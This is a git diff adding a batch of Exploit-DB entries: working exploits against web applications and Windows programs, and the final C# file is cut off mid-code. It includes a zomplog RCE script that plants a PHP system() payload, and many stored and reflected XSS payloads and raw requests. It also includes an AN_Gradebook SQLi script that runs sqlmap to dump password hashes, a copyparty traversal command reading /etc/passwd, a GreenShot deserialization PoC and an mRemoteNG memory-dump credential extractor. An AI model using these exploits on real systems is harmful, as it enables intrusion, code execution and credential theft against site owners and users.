@@ -0,0 +1,58 @@
+#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
+#Application: zomplog
+#Version: v3.9
+#Bugs:  RCE
+#Technology: PHP
+#Vendor URL: http://zomp.nl/zomplog/
+#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
+#Date of found: 22.07.2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+
+import requests
+
+#inputs
+username=input('username: ')
+password=input('password: ')
+
+#urls
+login_url="http://localhost/zimplitcms/zimplit.php?action=login"
+payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
+rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
+poc_url="http://localhost/zimplitcms/poc.php"
+
+
+#login
+session = requests.Session()
+login_data=f"lang=en&username={username}&password={password}&submit=Start!"
+headers={
+    'Cookie' : 'ZsessionLang=en',
+    'Content-Type' : 'application/x-www-form-urlencoded',
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
+    }
+login_req=session.post(login_url,headers=headers,data=login_data)
+
+if login_req.status_code == 200:
+    print('Login OK')
+else:
+    print('Login promlem.')
+    exit()
+#payload
+payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
+pheaders={
+    'Content-Type' : 'application/x-www-form-urlencoded',
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
+    }
+payload_req=session.post(payload_url,headers=pheaders,data=payload_data)
+
+#rename
+
+rename_req=session.get(rename_url)
+
+#poc
+poc_req=session.get(poc_url)
+print(poc_req.text)
+
+
+#youtube poc video - https://youtu.be/nn7hieGyCFs
\ No newline at end of file
diff --git a/exploits/php/webapps/51625.txt b/exploits/php/webapps/51625.txt
new file mode 100644
index 000000000..0dd47c122
--- /dev/null
+++ b/exploits/php/webapps/51625.txt
@@ -0,0 +1,43 @@
+Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
+Application: Zomplog
+Version: v3.9
+Bugs:  XSS
+Technology: PHP
+Vendor URL: http://zomp.nl/zomplog/
+Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
+Date of found: 22.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+1. Login to account
+2. Add new page
+3. Set as <img src=x onerror=alert(4)>
+4. Go to menu
+
+Poc request:
+
+POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
+Host: localhost
+Content-Length: 11
+sec-ch-ua:
+Accept: */*
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
+Connection: close
+
+empty=empty
\ No newline at end of file
diff --git a/exploits/php/webapps/51626.txt b/exploits/php/webapps/51626.txt
new file mode 100644
index 000000000..918f4e187
--- /dev/null
+++ b/exploits/php/webapps/51626.txt
@@ -0,0 +1,114 @@
+# Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
+# Date: 07/2023
+# Exploit Author: Andrey Stoykov
+# Tested on: Ubuntu 20.04
+# Blog: http://msecureltd.blogspot.com
+
+
+XSS #1:
+
+Steps to Reproduce:
+
+1. Browse to Bookings
+2. Select All Bookings
+3. Edit booking and select Promo Code
+4. Enter payload TEST"><script>alert(`XSS`)</script>
+
+
+// HTTP POST request
+
+POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
+Host: hostname
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+[...]
+
+[...]
+edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
+[...]
+
+// HTTP response
+
+HTTP/1.1 200 OK
+Content-Type: text/html; charset=utf-8
+Content-Length: 205
+[...]
+
+
+
+// HTTP GET request to Bookings page
+
+GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
+Host: hostname
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+[...]
+
+
+// HTTP response
+
+HTTP/1.1 200 OK
+Content-Type: text/html; charset=utf-8
+Content-Length: 33590
+[...]
+
+[...]
+<label class="control-label" for="promo_code">Promo code:</label>
+            <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
+        </div>
+[...]
+
+
+
+Unrestricted File Upload #1:
+
+
+// SVG file contents
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(`XSS`);
+   </script>
+</svg>
+
+
+Steps to Reproduce:
+
+1. Browse My Account
+2. Image Browse -> Upload
+3. Then right click on image
+4. Select Open Image in New Tab
+
+
+// HTTP POST request
+
+POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
+Host: hostname
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+[...]
+
+[...]
+-----------------------------13831219578609189241212424546
+Content-Disposition: form-data; name="img"; filename="xss.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(`XSS`);
+   </script>
+</svg>
+[...]
+
+
+// HTTP response
+
+HTTP/1.1 200 OK
+Content-Type: text/html; charset=utf-8
+Content-Length: 190
+[...]
\ No newline at end of file
diff --git a/exploits/php/webapps/51627.txt b/exploits/php/webapps/51627.txt
new file mode 100644
index 000000000..8c3873c22
--- /dev/null
+++ b/exploits/php/webapps/51627.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS)
+# Google Dork: N/A
+# Date: 23-July-2023
+# Exploit Author: Dinesh Mohanty
+# Vendor Homepage: https://grabaperch.com/
+# Software Link: https://grabaperch.com/download
+# Version: v3.2
+# Tested on: Windows
+# CVE : Requested
+
+# Description:
+Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the file upload functionally under the create asset section.
+
+#Steps to Reproduce
+
+User needs to login into the application and needs to follow below steps:
+
+1. Login into the application
+2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/)
+3. Click on "Add assets" and fill all other details (Please note not all the text fields are vulnerable to XSS as they have output encoding)
+4. Create the SVG file with below contents say xss.svg
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+  <script type="text/javascript">
+    alert("XSS");
+  </script>
+</svg>
+
+4. In the File upload section upload the above SVG file and submit
+5. Now go to above SVG directly say the file is xss.svg
+6. go to svg file (http://URL/perch/resources/xss.svg) or you can view all Assets and view the image
+7. One can see that we got an XSS alert.
\ No newline at end of file
diff --git a/exploits/php/webapps/51628.txt b/exploits/php/webapps/51628.txt
new file mode 100644
index 000000000..2b9d57a38
--- /dev/null
+++ b/exploits/php/webapps/51628.txt
@@ -0,0 +1,83 @@
+# Exploit Title: mooDating 1.2 - Reflected Cross-site scripting (XSS)
+# Exploit Author: CraCkEr aka (skalvin)
+# Date: 22/07/2023
+# Vendor: mooSocial
+# Vendor Homepage: https://moodatingscript.com/
+# Software Link: https://demo.moodatingscript.com/home
+# Version: 1.2
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-3849, CVE-2023-3848, CVE-2023-3847, CVE-2023-3846, CVE-2023-3843, CVE-2023-3845, CVE-2023-3844
+
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /matchmakings/question
+
+URL parameter is vulnerable to RXSS
+
+https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=
+https://website/matchmakings/question[XSS]?number=
+
+
+Path: /friends
+
+URL parameter is vulnerable to RXSS
+
+https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model
+https://website/friends[XSS]/ajax_invite?mode=model
+
+
+Path: /friends/ajax_invite
+
+URL parameter is vulnerable to RXSS
+
+https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model
+https://website/friends/ajax_invite[XSS]?mode=model
+
+Path: /pages
+
+URL parameter is vulnerable to RXSS
+
+https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
+https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
+
+Path: /users
+
+URL parameter is vulnerable to RXSS
+
+https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity
+https://website/user[XSS]/view/108?tab=activity
+
+Path: /users/view
+
+URL parameter is vulnerable to RXSS
+
+https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity
+https://website/users/view[XSS]/108?tab=activity
+
+
+Path: /find-a-match
+
+URL parameter is vulnerable to RXSS
+
+https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
+https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
+
+
+[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51629.txt b/exploits/php/webapps/51629.txt
new file mode 100644
index 000000000..ad68e90fe
--- /dev/null
+++ b/exploits/php/webapps/51629.txt
@@ -0,0 +1,60 @@
+# Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 24/07/2023
+# Vendor: Hikari Software Team
+# Vendor Homepage: https://www.hikashop.com/
+# Software Link: https://demo.hikashop.com/index.php/en/
+# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/
+# Version: 4.7.4
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /index.php
+
+GET parameter 'from_option' is vulnerable to RXSS
+
+https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103
+
+
+Path: /index.php
+
+GET parameter 'from_ctrl' is vulnerable to RXSS
+
+https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103
+
+
+Path: /index.php
+
+GET parameter 'from_task' is vulnerable to RXSS
+
+https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103
+
+
+Path: /index.php
+
+GET parameter 'from_itemid' is vulnerable to RXSS
+
+https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS]
+
+
+[XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51630.txt b/exploits/php/webapps/51630.txt
new file mode 100644
index 000000000..316d9173d
--- /dev/null
+++ b/exploits/php/webapps/51630.txt
@@ -0,0 +1,24 @@
+#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
+#Date: 29 June 2023
+#Exploit Author: Okan Kurtulus
+#Vendor Homepage: https://octobercms.com
+#Version: v3.4.4
+#Tested on: Ubuntu 22.04
+#CVE : N/A
+
+# Proof of Concept:
+1– Install the system through the website and log in with any user with file upload authority.
+2– Select "Media" in the top menu. Prepare an SVG file using the payload below.
+3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.
+
+#Stored XSS Payload:
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+  <script type="text/javascript">
+    alert(1);
+  </script>
+</svg>
\ No newline at end of file
diff --git a/exploits/php/webapps/51631.txt b/exploits/php/webapps/51631.txt
new file mode 100644
index 000000000..99bb444e0
--- /dev/null
+++ b/exploits/php/webapps/51631.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 24/07/2023
+# Vendor: VirtueMart Team
+# Vendor Homepage: https://www.virtuemart.net/
+# Software Link: https://demo.virtuemart.net/
+# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/
+# Version: 4.0.12
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /product-variants
+
+GET parameter 'keyword' is vulnerable to RXSS
+
+https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925
+
+
+[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51632.py b/exploits/php/webapps/51632.py
new file mode 100755
index 000000000..5210bef15
--- /dev/null
+++ b/exploits/php/webapps/51632.py
@@ -0,0 +1,98 @@
+#!/usr/bin/python3
+
+# Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
+# Date: 2023-07-26
+# Exploit Author: Lukas Kinneberg
+# Github: https://github.com/lukinneberg/CVE-2023-2636
+# Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
+# Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
+# Tested on: WordPress 6.2.2
+# CVE: CVE-2023-2636
+
+
+from datetime import datetime
+import os
+import requests
+import json
+
+# User Input:
+target_ip = 'CHANGE_THIS'
+target_port = '80'
+username = 'hacker'
+password = 'hacker'
+
+banner = '''
+
+ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
+||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
+||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
+|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
+		Exploit Author: Lukas Kinneberg
+
+'''
+
+print(banner)
+
+print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
+
+# Authentication:
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'
+check = session.get(auth_url)
+# Header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Origin': 'http://' + target_ip,
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+    'log': username,
+    'pwd': password,
+    'wp-submit': 'Log In',
+    'testcookie': '1'
+}
+auth = session.post(auth_url, headers=header, data=body)
+
+# SQL-Injection (Exploit):
+# Generate payload for sqlmap
+cookies_session = session.cookies.get_dict()
+cookie = json.dumps(cookies_session)
+cookie = cookie.replace('"}','')
+cookie = cookie.replace('{"', '')
+cookie = cookie.replace('"', '')
+cookie = cookie.replace(" ", '')
+cookie = cookie.replace(":", '=')
+cookie = cookie.replace(',', '; ')
+
+print('[*] Payload for SQL-Injection:')
+
+# Enter the URL path of the course after the target_port below
+exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '
+exploitcode_risk = '--level 2 --risk 2 '
+exploitcode_cookie = '--cookie="' + cookie + '" '
+
+
+# SQLMAP Printout
+print('    Sqlmap options:')
+print('     -a, --all           Retrieve everything')
+print('     -b, --banner        Retrieve DBMS banner')
+print('     --current-user      Retrieve DBMS current user')
+print('     --current-db        Retrieve DBMS current database')
+print('     --passwords         Enumerate DBMS users password hashes')
+print('     --tables            Enumerate DBMS database tables')
+print('     --columns           Enumerate DBMS database table column')
+print('     --schema            Enumerate DBMS schema')
+print('     --dump              Dump DBMS database table entries')
+print('     --dump-all          Dump all DBMS databases tables entries')
+retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
+exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'
+os.system(exploitcode)
+print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
\ No newline at end of file
diff --git a/exploits/python/webapps/51635.txt b/exploits/python/webapps/51635.txt
new file mode 100644
index 000000000..12ce559ee
--- /dev/null
+++ b/exploits/python/webapps/51635.txt
@@ -0,0 +1,18 @@
+# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
+# Date: 23/07/2023
+# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
+# Vendor Homepage: https://github.com/9001/copyparty/
+# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
+# Version: <=1.8.6
+# Tested on: Debian Linux
+# CVE : CVE-2023-38501
+
+
+
+#Description
+Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.
+
+Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
+
+#POC
+https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E
\ No newline at end of file
diff --git a/exploits/python/webapps/51636.txt b/exploits/python/webapps/51636.txt
new file mode 100644
index 000000000..5c063a43f
--- /dev/null
+++ b/exploits/python/webapps/51636.txt
@@ -0,0 +1,17 @@
+# Exploit Title: copyparty 1.8.2 - Directory Traversal
+# Date: 14/07/2023
+# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
+# Vendor Homepage: https://github.com/9001/copyparty/
+# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
+# Version: <=1.8.2
+# Tested on: Debian Linux
+# CVE : CVE-2023-37474
+
+
+
+
+#Description
+Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.
+
+#POC
+curl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
\ No newline at end of file
diff --git a/exploits/windows/local/51633.ps1 b/exploits/windows/local/51633.ps1
new file mode 100644
index 000000000..0e6193761
--- /dev/null
+++ b/exploits/windows/local/51633.ps1
@@ -0,0 +1,42 @@
+# Exploit Title: GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution
+# Date: 26/07/2023
+# Exploit Author: p4r4bellum
+# Vendor Homepage: https://getgreenshot.org
+# Software Link: https://getgreenshot.org/downloads/
+# Version: 1.2.6.10
+# Tested on: windows 10.0.19045 N/A build 19045
+# CVE : CVE-2023-34634
+#
+# GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format
+# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software
+# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file
+# will lead to arbitrary code execution
+#
+# Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
+./ysoserial.exe -f BinaryFormatter -g WindowsIdentity  -c "calc" --outputpath payload.bin -o raw
+#load the payload
+$payload = Get-Content .\payload.bin -Encoding Byte
+# retrieve the length of the payload
+$length = $payload.Length
+# load the required assembly to craft a PNG file
+Add-Type -AssemblyName System.Drawing
+# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
+$filename = "$home\poc.greenshot"
+$bmp = new-object System.Drawing.Bitmap 250,61
+$font = new-object System.Drawing.Font Consolas,24
+$brushBg = [System.Drawing.Brushes]::Green
+$brushFg = [System.Drawing.Brushes]::Black
+$graphics = [System.Drawing.Graphics]::FromImage($bmp)
+$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
+$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)
+$graphics.Dispose()
+$bmp.Save($filename)
+
+# append the payload to the PNG file
+$payload | Add-Content -Path $filename -Encoding Byte -NoNewline
+# append the length of the payload
+[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding  Byte -NoNewline
+# append the signature
+"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
+# launch greenshot. Calc.exe should be executed
+Invoke-Item  $filename
\ No newline at end of file
diff --git a/exploits/windows/local/51637.txt b/exploits/windows/local/51637.txt
new file mode 100644
index 000000000..eca61739b
--- /dev/null
+++ b/exploits/windows/local/51637.txt
@@ -0,0 +1,148 @@
+# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory
+# Google Dork: -
+# Date: 21.07.2023
+# Exploit Author: Maximilian Barz
+# Vendor Homepage: https://mremoteng.org/
+# Software Link: https://mremoteng.org/download
+# Version: mRemoteNG <= v1.77.3.1784-NB
+# Tested on: Windows 11
+# CVE : CVE-2023-30367
+
+
+
+
+/*
+Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to
+store and manage multi-protocol connection configurations to remotely connect to systems.
+
+mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev
+loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,
+even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text
+through a memory dump and thus compromise user credentials when no custom password encryption key has been set.
+This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.
+Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper
+*/
+
+
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Reflection;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Text.RegularExpressions;
+
+
+namespace mRemoteNGDumper
+{
+public static class Program
+{
+
+public enum MINIDUMP_TYPE
+{
+MiniDumpWithFullMemory = 0x00000002
+}
+
+[StructLayout(LayoutKind.Sequential, Pack = 4)]
+public struct MINIDUMP_EXCEPTION_INFORMATION
+{
+public uint ThreadId;
+public IntPtr ExceptionPointers;
+public int ClientPointers;
+}
+
+[DllImport("kernel32.dll")]
+static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
+
+[DllImport("Dbghelp.dll")]
+static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
+
+
+static void Main(string[] args)
+{
+string input;
+bool configfound = false;
+StringBuilder filesb;
+StringBuilder linesb;
+List<string> configs = new List<string>();
+
+Process[] localByName = Process.GetProcessesByName("mRemoteNG");
+
+if (localByName.Length == 0) {
+Console.WriteLine("[-] No mRemoteNG process was found. Exiting");
+System.Environment.Exit(1);
+}
+string assemblyPath = Assembly.GetEntryAssembly().Location;
+Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);
+string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";
+FileStream procdumpFileStream = File.Create(dumpFileName);
+MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();
+
+// A full memory dump is necessary in the case of a managed application, other wise no information
+// regarding the managed code will be available
+MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;
+MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);
+procdumpFileStream.Close();
+
+filesb = new StringBuilder();
+Console.WriteLine("[+] Searching for configuration files in memory dump.");
+using (StreamReader reader = new StreamReader(dumpFileName))
+{
+while (reader.Peek() >= 0)
+{
+input = reader.ReadLine();
+string pattern = @"(\<Node)(.*)(?=\/>)\/>";
+Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);
+if (m.Success)
+{
+configfound = true;
+
+foreach (string config in m.Value.Split('>'))
+{
+configs.Add(config);
+}
+}
+
+}
+
+reader.Close();
+if (configfound)
+{
+string currentDir = System.IO.Directory.GetCurrentDirectory();
+string dumpdir = currentDir + "/dump";
+if (!Directory.Exists(dumpdir))
+{
+Directory.CreateDirectory(dumpdir);
+}
+
+string savefilepath;
+for (int i =0; i < configs.Count;i++)
+{
+if (!string.IsNullOrEmpty(configs[i]))
+{
+savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";
+Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);
+using (StreamWriter writer = new StreamWriter(savefilepath))
+{
+writer.Write(configs[i]+'>');
+writer.Close();
+}
+}
+}
+Console.WriteLine("[+] Done!");
+Console.WriteLine("[+] Deleting memorydump file!");
+File.Delete(dumpFileName);
